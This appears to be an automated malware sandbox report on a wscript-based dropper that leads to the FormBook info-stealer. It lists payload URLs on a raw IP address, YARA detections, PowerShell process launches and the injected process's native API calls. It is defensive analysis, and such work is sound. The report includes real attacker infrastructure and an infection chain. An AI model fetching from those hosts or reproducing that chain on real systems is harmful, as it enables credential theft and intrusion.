          Source: wscript.exe, 00000000.00000003.2158218358.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166607159.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158078701.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158967775.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158910701.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165501956.000002131774A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168732062.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166276434.00000213179D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158858187.000002131774C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/r
          Source: wscript.exe, 00000000.00000003.2158218358.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166607159.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158078701.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2148962279.0000021315A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158967775.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158910701.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165501956.000002131774A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168732062.0000021317750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142682570.0000021315A72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142780136.0000021315A3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166276434.00000213179D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158858187.000002131774C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/s
          Source: wscript.exe, 00000000.00000003.2148962279.0000021315A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142780136.0000021315A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/stem
          Source: wscript.exe, 00000000.00000003.2157529486.0000021315A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157462766.0000021315A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157545405.0000021315A35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157481785.0000021315A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/u9icZZB5Fm5owWojnw5Q.txt
          Source: wscript.exe, 00000000.00000003.2165519546.0000021315958000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2167970238.0000007E5A0F2000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166630724.0000021315959000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158967775.000002131774C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167561687.0000021315AAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165501956.000002131774A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163830069.0000021315A96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2158967775.0000021317748000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167359857.0000021315AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163901569.0000021315AAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/v
          Source: wscript.exe, 00000000.00000003.2166395633.00000213179D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/v75
          Source: wscript.exe, 00000000.00000003.2142682570.0000021315A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/c
          Source: wscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142958351.0000021315A35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142939052.0000021315A2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2149023769.0000021315A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157529486.0000021315A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168475689.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157462766.0000021315A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2157545405.0000021315A35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2149037908.0000021315A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/ll
          Source: wscript.exe, 00000000.00000003.2163847317.0000021315A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168596475.0000021315A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2508/fileJb
          Source: wscript.exe, 00000000.00000003.2165581468.0000021315A0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166759289.0000021315A16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166051740.0000021315A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168457150.0000021315A16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167235585.0000021315A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2508/s
          Source: wscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168475689.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.db0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.db0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: amsi64_5960.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_5264.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_2056.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_3780.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_5256.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_5368.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_6068.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_1596.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_4392.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi64_6780.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 5.2.AddInProcess32.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.AddInProcess32.exe.db0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DB19EC NtProtectVirtualMemory,5_2_00DB19EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DDC4D3 NtClose,5_2_00DDC4D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E35C0 NtCreateMutant,LdrInitializeThunk,5_2_018E35C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2B60 NtClose,LdrInitializeThunk,5_2_018E2B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_018E2DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_018E2C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E3090 NtSetValueKey,5_2_018E3090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E3010 NtOpenDirectoryObject,5_2_018E3010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E4340 NtSetContextThread,5_2_018E4340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E4650 NtSuspendThread,5_2_018E4650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E39B0 NtGetContextThread,5_2_018E39B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2B80 NtQueryInformationFile,5_2_018E2B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2BA0 NtEnumerateValueKey,5_2_018E2BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2BE0 NtQueryValueKey,5_2_018E2BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2BF0 NtAllocateVirtualMemory,5_2_018E2BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2AB0 NtWaitForSingleObject,5_2_018E2AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2AD0 NtReadFile,5_2_018E2AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2AF0 NtWriteFile,5_2_018E2AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2DB0 NtEnumerateKey,5_2_018E2DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2DD0 NtDelayExecution,5_2_018E2DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2D00 NtSetInformationFile,5_2_018E2D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E3D10 NtOpenProcessToken,5_2_018E3D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2D10 NtMapViewOfSection,5_2_018E2D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2D30 NtUnmapViewOfSection,5_2_018E2D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E3D70 NtOpenThread,5_2_018E3D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2CA0 NtQueryInformationToken,5_2_018E2CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2CC0 NtQueryVirtualMemory,5_2_018E2CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2CF0 NtOpenProcess,5_2_018E2CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2C00 NtQueryInformationProcess,5_2_018E2C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2C60 NtCreateKey,5_2_018E2C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2F90 NtProtectVirtualMemory,5_2_018E2F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2FA0 NtQuerySection,5_2_018E2FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2FB0 NtResumeThread,5_2_018E2FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2FE0 NtCreateFile,5_2_018E2FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2F30 NtCreateSection,5_2_018E2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2F60 NtCreateProcessEx,5_2_018E2F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2E80 NtReadVirtualMemory,5_2_018E2E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2EA0 NtAdjustPrivilegesToken,5_2_018E2EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2EE0 NtQueueApcThread,5_2_018E2EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E2E30 NtWriteVirtualMemory,5_2_018E2E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DB31F05_2_00DB31F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DB12105_2_00DB1210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DDEB335_2_00DDEB33
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DBFC435_2_00DBFC43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DBFC405_2_00DBFC40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DC65DE5_2_00DC65DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DC65E35_2_00DC65E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DB25205_2_00DB2520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DBDEE35_2_00DBDEE3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DBFE635_2_00DBFE63
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BB1B05_2_018BB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019701AA5_2_019701AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019681CC5_2_019681CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A01005_2_018A0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194A1185_2_0194A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019381585_2_01938158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E516C5_2_018E516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189F1725_2_0189F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0197B16B5_2_0197B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B70C05_2_018B70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195F0CC5_2_0195F0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196F0E05_2_0196F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019670E95_2_019670E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018F739A5_2_018F739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019703E65_2_019703E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BE3F05_2_018BE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196132D5_2_0196132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196A3525_2_0196A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189D34C5_2_0189D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B52A05_2_018B52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CB2C05_2_018CB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019512ED5_2_019512ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019502745_2_01950274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019705915_2_01970591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194D5B05_2_0194D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B05355_2_018B0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019675715_2_01967571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195E4F65_2_0195E4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196F43F5_2_0196F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019624465_2_01962446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A14605_2_018A1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196F7B05_2_0196F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AC7C05_2_018AC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D47505_2_018D4750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B07705_2_018B0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019616CC5_2_019616CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CC6E05_2_018CC6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B29A05_2_018B29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0197A9A65_2_0197A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B99505_2_018B9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CB9505_2_018CB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C69625_2_018C6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018968B85_2_018968B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B38E05_2_018B38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE8F05_2_018DE8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191D8005_2_0191D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B28405_2_018B2840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BA8405_2_018BA840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CFB805_2_018CFB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01966BD75_2_01966BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01925BF05_2_01925BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018EDBF95_2_018EDBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196AB405_2_0196AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196FB765_2_0196FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AEA805_2_018AEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018F5AA05_2_018F5AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194DAAC5_2_0194DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195DAC65_2_0195DAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01967A465_2_01967A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196FA495_2_0196FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01923A6C5_2_01923A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C8DBF5_2_018C8DBF
